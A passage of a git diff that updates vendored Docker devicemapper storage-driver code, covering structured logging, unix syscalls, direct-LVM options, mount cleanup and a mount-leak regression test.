hash, baseHash) // If a deleted device exists, return error. baseInfo, err := devices.lookupDeviceWithLock(baseHash) @@ -1975,7 +1972,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error { return nil } - logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("Marking device %s for deferred deletion.", info.Hash) info.Deleted = true @@ -1992,7 +1989,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error { // Should be called with devices.Lock() held. func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error { if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error opening transaction hash = %s deviceId = %d", "", info.DeviceID) return err } @@ -2004,13 +2001,13 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro // deletion is not enabled, we return an error. If error is // something other then EBUSY, return an error. if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy { - logrus.Debugf("devmapper: Error deleting device: %s", err) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error deleting device: %s", err) return err } } if err == nil { - if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil { + if err := devices.unregisterDevice(info.Hash); err != nil { return err } // If device was already in deferred delete state that means @@ -2031,8 +2028,9 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro // Issue discard only if device open count is zero. func (devices *DeviceSet) issueDiscard(info *devInfo) error { - logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash) - defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash) + logger := logrus.WithField("storage-driver", "devicemapper") + logger.Debugf("issueDiscard START(device: %s).", info.Hash) + defer logger.Debugf("issueDiscard END(device: %s).", info.Hash) // This is a workaround for the kernel not discarding block so // on the thin pool when we remove a thinp device, so we do it // manually. @@ -2048,12 +2046,12 @@ func (devices *DeviceSet) issueDiscard(info *devInfo) error { } if devinfo.OpenCount != 0 { - logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount) + logger.Debugf("Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount) return nil } if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil { - logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err) + logger.Debugf("Error discarding block on device: %s (ignoring)", err) } return nil } @@ -2065,24 +2063,29 @@ func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error { } // Try to deactivate device in case it is active. - if err := devices.deactivateDevice(info); err != nil { - logrus.Debugf("devmapper: Error deactivating device: %s", err) - return err + // If deferred removal is enabled and deferred deletion is disabled + // then make sure device is removed synchronously. There have been + // some cases of device being busy for short duration and we would + // rather busy wait for device removal to take care of these cases. + deferredRemove := devices.deferredRemove + if !devices.deferredDelete { + deferredRemove = false } - if err := devices.deleteTransaction(info, syncDelete); err != nil { + if err := devices.deactivateDeviceMode(info, deferredRemove); err != nil { + logrus.WithField("storage-driver", "devicemapper").Debugf("Error deactivating device: %s", err) return err } - return nil + return devices.deleteTransaction(info, syncDelete) } // DeleteDevice will return success if device has been marked for deferred // removal. If one wants to override that and want DeleteDevice() to fail if // device was busy and could not be deleted, set syncDelete=true. func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error { - logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete) - defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete) + logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete) info, err := devices.lookupDeviceWithLock(hash) if err != nil { return err @@ -2098,8 +2101,8 @@ func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error { } func (devices *DeviceSet) deactivatePool() error { - logrus.Debug("devmapper: deactivatePool() START") - defer logrus.Debug("devmapper: deactivatePool() END") + logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() START") + defer logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() END") devname := devices.getPoolDevName() devinfo, err := devicemapper.GetInfo(devname) @@ -2115,15 +2118,20 @@ func (devices *DeviceSet) deactivatePool() error { } if d, err := devicemapper.GetDeps(devname); err == nil { - logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count) + logrus.WithField("storage-driver", "devicemapper").Warnf("device %s still has %d active dependents", devname, d.Count) } return nil } func (devices *DeviceSet) deactivateDevice(info *devInfo) error { - logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash) - defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash) + return devices.deactivateDeviceMode(info, devices.deferredRemove) +} + +func (devices *DeviceSet) deactivateDeviceMode(info *devInfo, deferredRemove bool) error { + var err error + logrus.WithField("storage-driver", "devicemapper").Debugf("deactivateDevice START(%s)", info.Hash) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("deactivateDevice END(%s)", info.Hash) devinfo, err := devicemapper.GetInfo(info.Name()) if err != nil { @@ -2134,14 +2142,17 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error { return nil } - if devices.deferredRemove { - if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil { - return err - } + if deferredRemove { + err = devicemapper.RemoveDeviceDeferred(info.Name()) } else { - if err := devices.removeDevice(info.Name()); err != nil { - return err - } + err = devices.removeDevice(info.Name()) + } + + // This function's semantics is such that it does not return an + // error if device does not exist. So if device went away by + // the time we actually tried to remove it, do not return error. + if err != devicemapper.ErrEnxio { + return err } return nil } @@ -2150,8 +2161,8 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error { func (devices *DeviceSet) removeDevice(devname string) error { var err error - logrus.Debugf("devmapper: removeDevice START(%s)", devname) - defer logrus.Debugf("devmapper: removeDevice END(%s)", devname) + logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice START(%s)", devname) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice END(%s)", devname) for i := 0; i < 200; i++ { err = devicemapper.RemoveDevice(devname) @@ -2177,8 +2188,8 @@ func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error { return nil } - logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name()) - defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name()) + logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded START(%s)", info.Name()) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded END(%s)", info.Name()) devinfo, err := devicemapper.GetInfoWithDeferred(info.Name()) if err != nil { @@ -2200,8 +2211,8 @@ func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error { } func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error { - logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name()) - defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name()) + logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval START(%s)", info.Name()) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval END(%s)", info.Name()) var err error @@ -2223,11 +2234,47 @@ func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error { return err } +func (devices *DeviceSet) unmountAndDeactivateAll(dir string) { + logger := logrus.WithField("storage-driver", "devicemapper") + + files, err := ioutil.ReadDir(dir) + if err != nil { + logger.Warnf("unmountAndDeactivate: %s", err) + return + } + + for _, d := range files { + if !d.IsDir() { + continue + } + + name := d.Name() + fullname := path.Join(dir, name) + + // We use MNT_DETACH here in case it is still busy in some running + // container. This means it'll go away from the global scope directly, + // and the device will be released when that container dies. + if err := unix.Unmount(fullname, unix.MNT_DETACH); err != nil && err != unix.EINVAL { + logger.Warnf("Shutdown unmounting %s, error: %s", fullname, err) + } + + if devInfo, err := devices.lookupDevice(name); err != nil { + logger.Debugf("Shutdown lookup device %s, error: %s", name, err) + } else { + if err := devices.deactivateDevice(devInfo); err != nil { + logger.Debugf("Shutdown deactivate %s, error: %s", devInfo.Hash, err) + } + } + } +} + // Shutdown shuts down the device by unmounting the root. func (devices *DeviceSet) Shutdown(home string) error { - logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix) - logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root) - defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("[deviceset %s] Shutdown()", devices.devicePrefix) + logger.Debugf("Shutting down DeviceSet: %s", devices.root) + defer logger.Debugf("[deviceset %s] Shutdown() END", devices.devicePrefix) // Stop deletion worker. This should start delivering new events to // ticker channel. That means no new instance of cleanupDeletedDevice() @@ -2244,45 +2291,7 @@ func (devices *DeviceSet) Shutdown(home string) error { // will be killed and we will not get a chance to save deviceset // metadata. Hence save this early before trying to deactivate devices. devices.saveDeviceSetMetaData() - - // ignore the error since it's just a best effort to not try to unmount something that's mounted - mounts, _ := mount.GetMounts() - mounted := make(map[string]bool, len(mounts)) - for _, mnt := range mounts { - mounted[mnt.Mountpoint] = true - } - - if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error { - if err != nil { - return err - } - if !info.IsDir() { - return nil - } - - if mounted[p] { - // We use MNT_DETACH here in case it is still busy in some running - // container. This means it'll go away from the global scope directly, - // and the device will be released when that container dies. - if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil { - logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err) - } - } - - if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil { - logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err) - } else { - if err := devices.deactivateDevice(devInfo); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err) - } - } - - return nil - }); err != nil && !os.IsNotExist(err) { - devices.Unlock() - return err - } - + devices.unmountAndDeactivateAll(path.Join(home, "mnt")) devices.Unlock() info, _ := devices.lookupDeviceWithLock("") @@ -2290,7 +2299,7 @@ func (devices *DeviceSet) Shutdown(home string) error { info.lock.Lock() devices.Lock() if err := devices.deactivateDevice(info); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err) + logger.Debugf("Shutdown deactivate base , error: %s", err) } devices.Unlock() info.lock.Unlock() @@ -2299,7 +2308,7 @@ func (devices *DeviceSet) Shutdown(home string) error { devices.Lock() if devices.thinPoolDevice == "" { if err := devices.deactivatePool(); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err) + logger.Debugf("Shutdown deactivate pool , error: %s", err) } } devices.Unlock() @@ -2372,12 +2381,12 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error { options = joinMountOptions(options, label.FormatMountLabel("", mountLabel)) if err := mount.Mount(info.DevName(), path, fstype, options); err != nil { - return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err) + return fmt.Errorf("devmapper: Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), path, fstype, options, err, string(dmesg.Dmesg(256))) } if fstype == "xfs" && devices.xfsNospaceRetries != "" { if err := devices.xfsSetNospaceRetries(info); err != nil { - syscall.Unmount(path, syscall.MNT_DETACH) + unix.Unmount(path, unix.MNT_DETACH) devices.deactivateDevice(info) return err } @@ -2388,8 +2397,10 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error { // UnmountDevice unmounts the device and removes it from hash. func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error { - logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash) - defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("UnmountDevice START(hash=%s)", hash) + defer logger.Debugf("UnmountDevice END(hash=%s)", hash) info, err := devices.lookupDeviceWithLock(hash) if err != nil { @@ -2402,17 +2413,25 @@ func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error { devices.Lock() defer devices.Unlock() - logrus.Debugf("devmapper: Unmount(%s)", mountPath) - if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil { + logger.Debugf("Unmount(%s)", mountPath) + if err := unix.Unmount(mountPath, unix.MNT_DETACH); err != nil { return err } - logrus.Debug("devmapper: Unmount done") + logger.Debug("Unmount done") - if err := devices.deactivateDevice(info); err != nil { - return err + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be killed (this is an anti-DoS measure that is necessary for things + // like devicemapper). This is necessary to avoid cases where a libdm mount + // that is present in another namespace will cause subsequent RemoveDevice + // operations to fail. We ignore any errors here because this may fail on + // older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. + if err := os.Remove(mountPath); err != nil { + logger.Debugf("error doing a remove on unmounted device %s: %v", mountPath, err) } - return nil + return devices.deactivateDevice(info) } // HasDevice returns true if the device metadata exists. @@ -2504,9 +2523,9 @@ func (devices *DeviceSet) MetadataDevicePath() string { } func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) { - buf := new(syscall.Statfs_t) - if err := syscall.Statfs(loopFile, buf); err != nil { - logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err) + buf := new(unix.Statfs_t) + if err := unix.Statfs(loopFile, buf); err != nil { + logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile filesystem %v: %v", loopFile, err) return 0, err } return buf.Bfree * uint64(buf.Bsize), nil @@ -2516,7 +2535,7 @@ func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) { if loopFile != "" { fi, err := os.Stat(loopFile) if err != nil { - logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err) + logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile %v: %v", loopFile, err) return false, err } return fi.Mode().IsRegular(), nil @@ -2614,7 +2633,24 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ minFreeSpacePercent: defaultMinFreeSpacePercent, } + version, err := devicemapper.GetDriverVersion() + if err != nil { + // Can't even get driver version, assume not supported + return nil, graphdriver.ErrNotSupported + } + + if err := determineDriverCapabilities(version); err != nil { + return nil, graphdriver.ErrNotSupported + } + + if driverDeferredRemovalSupport && devicemapper.LibraryDeferredRemovalSupport { + // enable deferred stuff by default + enableDeferredDeletion = true + enableDeferredRemoval = true + } + foundBlkDiscard := false + var lvmSetupConfig directLVMConfig for _, option := range options { key, val, err := parsers.ParseKeyValueOpt(option) if err != nil { @@ -2643,7 +2679,7 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ devices.metaDataLoopbackSize = size case "dm.fs": if val != "ext4" && val != "xfs" { - return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val) + return nil, fmt.Errorf("devmapper: Unsupported filesystem %s", val) } devices.filesystem = val case "dm.mkfsarg": @@ -2709,11 +2745,72 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ return nil, err } devices.xfsNospaceRetries = val + case "dm.directlvm_device": + lvmSetupConfig.Device = val + case "dm.directlvm_device_force": + lvmSetupConfigForce, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + case "dm.thinp_percent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_percent=%s`", val) + } + if per >= 100 { + return nil, errors.New("dm.thinp_percent must be greater than 0 and less than 100") + } + lvmSetupConfig.ThinpPercent = per + case "dm.thinp_metapercent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_metapercent=%s`", val) + } + if per >= 100 { + return nil, errors.New("dm.thinp_metapercent must be greater than 0 and less than 100") + } + lvmSetupConfig.ThinpMetaPercent = per + case "dm.thinp_autoextend_percent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_autoextend_percent=%s`", val) + } + if per > 100 { + return nil, errors.New("dm.thinp_autoextend_percent must be greater than 0 and less than 100") + } + lvmSetupConfig.AutoExtendPercent = per + case "dm.thinp_autoextend_threshold": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_autoextend_threshold=%s`", val) + } + if per > 100 { + return nil, errors.New("dm.thinp_autoextend_threshold must be greater than 0 and less than 100") + } + lvmSetupConfig.AutoExtendThreshold = per + case "dm.libdm_log_level": + level, err := strconv.ParseInt(val, 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.libdm_log_level=%s`", val) + } + if level < devicemapper.LogLevelFatal || level > devicemapper.LogLevelDebug { + return nil, errors.Errorf("dm.libdm_log_level must be in range [%d,%d]", devicemapper.LogLevelFatal, devicemapper.LogLevelDebug) + } + // Register a new logging callback with the specified level. + devicemapper.LogInit(devicemapper.DefaultLogger{ + Level: int(level), + }) default: - return nil, fmt.Errorf("devmapper: Unknown option %s\n", key) + return nil, fmt.Errorf("devmapper: Unknown option %s", key) } } + if err := validateLVMConfig(lvmSetupConfig); err != nil { + return nil, err + } + + devices.lvmSetupConfig = lvmSetupConfig + // By default, don't do blk discard hack on raw devices, its rarely useful and is expensive if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") { devices.doBlkDiscard = false diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go index 9ab3e4f864..98ff5cf124 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go @@ -1,4 +1,4 @@ -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" // Definition of struct dm_task and sub structures (from lvm2) // diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go index 5c2abcefcb..bda907a5d6 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go @@ -1,27 +1,72 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "fmt" + "os" + "os/exec" + "syscall" "testing" "time" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/parsers/kernel" + "golang.org/x/sys/unix" ) func init() { - // Reduce the size the the base fs and loopback for the tests + // Reduce the size of the base fs and loopback for the tests defaultDataLoopbackSize = 300 * 1024 * 1024 defaultMetaDataLoopbackSize = 200 * 1024 * 1024 defaultBaseFsSize = 300 * 1024 * 1024 defaultUdevSyncOverride = true - if err := graphtest.InitLoopbacks(); err != nil { + if err := initLoopbacks(); err != nil { panic(err) } } +// initLoopbacks ensures that the loopback devices are properly created within +// the system running the device mapper tests. +func initLoopbacks() error { + statT, err := getBaseLoopStats() + if err != nil { + return err + } + // create at least 8 loopback files, ya, that is a good number + for i := 0; i < 8; i++ { + loopPath := fmt.Sprintf("/dev/loop%d", i) + // only create new loopback files if they don't exist + if _, err := os.Stat(loopPath); err != nil { + if mkerr := syscall.Mknod(loopPath, + uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { + return mkerr + } + os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) + } + } + return nil +} + +// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the +// loop0 device on the system. If it does not exist we assume 0,0,0660 for the +// stat data +func getBaseLoopStats() (*syscall.Stat_t, error) { + loop0, err := os.Stat("/dev/loop0") + if err != nil { + if os.IsNotExist(err) { + return &syscall.Stat_t{ + Uid: 0, + Gid: 0, + Mode: 0660, + }, nil + } + return nil, err + } + return loop0.Sys().(*syscall.Stat_t), nil +} + // This avoids creating a new driver for each test if all tests are run // Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown func TestDevmapperSetup(t *testing.T) { @@ -59,7 +104,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS defer graphtest.PutDriver(t) // make sure data or metadata loopback size are the default size if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) { - t.Fatalf("data or metadata loop back size is incorrect") + t.Fatal("data or metadata loop back size is incorrect") } if err := driver.Cleanup(); err != nil { t.Fatal(err) @@ -74,7 +119,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS } driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) { - t.Fatalf("data or metadata loop back size is incorrect") + t.Fatal("data or metadata loop back size is incorrect") } if err := driver.Cleanup(); err != nil { t.Fatal(err) @@ -104,7 +149,57 @@ func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) { // function return and we are deadlocked. Release lock // here so that cleanup could succeed and fail the test. driver.DeviceSet.Unlock() - t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()") + t.Fatal("Could not acquire devices lock after call to cleanupDeletedDevices()") case <-doneChan: } } + +// Ensure that mounts aren't leakedriver. It's non-trivial for us to test the full +// reproducer of #34573 in a unit test, but we can at least make sure that a +// simple command run in a new namespace doesn't break things horribly. +func TestDevmapperMountLeaks(t *testing.T) { + if !kernel.CheckKernelVersion(3, 18, 0) { + t.Skipf("kernel version <3.18.0 and so is missing torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe.") + } + + driver := graphtest.GetDriver(t, "devicemapper", "dm.use_deferred_removal=false", "dm.use_deferred_deletion=false").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + + // We need to create a new (dummy) device. + if err := driver.Create("some-layer", "", nil); err != nil { + t.Fatalf("setting up some-layer: %v", err) + } + + // Mount the device. + _, err := driver.Get("some-layer", "") + if err != nil { + t.Fatalf("mounting some-layer: %v", err) + } + + // Create a new subprocess which will inherit our mountpoint, then + // intentionally leak it and stick around. We can't do this entirely within + // Go because forking and namespaces in Go are really not handled well at + // all. + cmd := exec.Cmd{ + Path: "/bin/sh", + Args: []string{ + "/bin/sh", "-c", + "mount --make-rprivate / && sleep 1000s", + }, + SysProcAttr: &syscall.SysProcAttr{ + Unshareflags: syscall.CLONE_NEWNS, + }, + } + if err := cmd.Start(); err != nil { + t.Fatalf("starting sub-command: %v", err) + } + defer func() { + unix.Kill(cmd.Process.Pid, unix.SIGKILL) + cmd.Wait() + }() + + // Now try to "drop" the device. + if err := driver.Put("some-layer"); err != nil { + t.Fatalf("unmounting some-layer: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go index 7cf422ce6a..df883de31d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go @@ -1,6 +1,6 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "fmt" @@ -9,13 +9,16 @@ import ( "path" "strconv" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/devicemapper" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" "github.com/docker/go-units" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func init() { @@ -29,6 +32,7 @@ type Driver struct { uidMaps []idtools.IDMap gidMaps []idtools.IDMap ctr *graphdriver.RefCounter + locker *locker.Locker } // Init creates a driver with the given home and the set of options. @@ -38,16 +42,13 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap return nil, err } - if err := mount.MakePrivate(home); err != nil { - return nil, err - } - d := &Driver{ DeviceSet: deviceSet, home: home, uidMaps: uidMaps, gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + locker: locker.New(), } return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil @@ -65,22 +66,17 @@ func (d *Driver) Status() [][2]string { status := [][2]string{ {"Pool Name", s.PoolName}, - {"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))}, - {"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))}, + {"Pool Blocksize", units.HumanSize(float64(s.SectorSize))}, + {"Base Device Size", units.HumanSize(float64(s.BaseDeviceSize))}, {"Backing Filesystem", s.BaseDeviceFS}, - {"Data file", s.DataFile}, - {"Metadata file", s.MetadataFile}, - {"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))}, - {"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))}, - {"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))}, - {"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))}, - {"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))}, - {"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))}, - {"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))}, {"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)}, - {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, - {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, - {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + } + + if len(s.DataFile) > 0 { + status = append(status, [2]string{"Data file", s.DataFile}) + } + if len(s.MetadataFile) > 0 { + status = append(status, [2]string{"Metadata file", s.MetadataFile}) } if len(s.DataLoopback) > 0 { status = append(status, [2]string{"Data loop file", s.DataLoopback}) @@ -88,6 +84,20 @@ func (d *Driver) Status() [][2]string { if len(s.MetadataLoopback) > 0 { status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback}) } + + status = append(status, [][2]string{ + {"Data Space Used", units.HumanSize(float64(s.Data.Used))}, + {"Data Space Total", units.HumanSize(float64(s.Data.Total))}, + {"Data Space Available", units.HumanSize(float64(s.Data.Available))}, + {"Metadata Space Used", units.HumanSize(float64(s.Metadata.Used))}, + {"Metadata Space Total", units.HumanSize(float64(s.Metadata.Total))}, + {"Metadata Space Available", units.HumanSize(float64(s.Metadata.Available))}, + {"Thin Pool Minimum Free Space", units.HumanSize(float64(s.MinFreeSpace))}, + {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, + {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, + {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + }...) + if vStr, err := devicemapper.GetLibraryVersion(); err == nil { status = append(status, [2]string{"Library Version", vStr}) } @@ -112,12 +122,18 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // Cleanup unmounts a device. func (d *Driver) Cleanup() error { err := d.DeviceSet.Shutdown(d.home) + umountErr := mount.RecursiveUnmount(d.home) - if err2 := mount.Unmount(d.home); err == nil { - err = err2 + // in case we have two errors, prefer the one from Shutdown() + if err != nil { + return err } - return err + if umountErr != nil { + return errors.Wrapf(umountErr, "error unmounting %s", d.home) + } + + return nil } // CreateReadWrite creates a layer that is writable for use as a container @@ -132,16 +148,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if opts != nil { storageOpt = opts.StorageOpt } - - if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil { - return err - } - - return nil + return d.DeviceSet.AddDevice(id, parent, storageOpt) } -// Remove removes a device with a given id, unmounts the filesystem. +// Remove removes a device with a given id, unmounts the filesystem, and removes the mount point. func (d *Driver) Remove(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) if !d.DeviceSet.HasDevice(id) { // Consider removing a non-existing device a no-op // This is useful to be able to progress on container removal @@ -151,51 +164,61 @@ func (d *Driver) Remove(id string) error { // This assumes the device has been properly Get/Put:ed and thus is unmounted if err := d.DeviceSet.DeleteDevice(id, false); err != nil { - return err + return fmt.Errorf("failed to remove device %s: %v", id, err) } + // Most probably the mount point is already removed on Put() + // (see DeviceSet.UnmountDevice()), but just in case it was not + // let's try to remove it here as well, ignoring errors as + // an older kernel can return EBUSY if e.g. the mount was leaked + // to other mount namespaces. A failure to remove the container's + // mount point is not important and should not be treated + // as a failure to remove the container. mp := 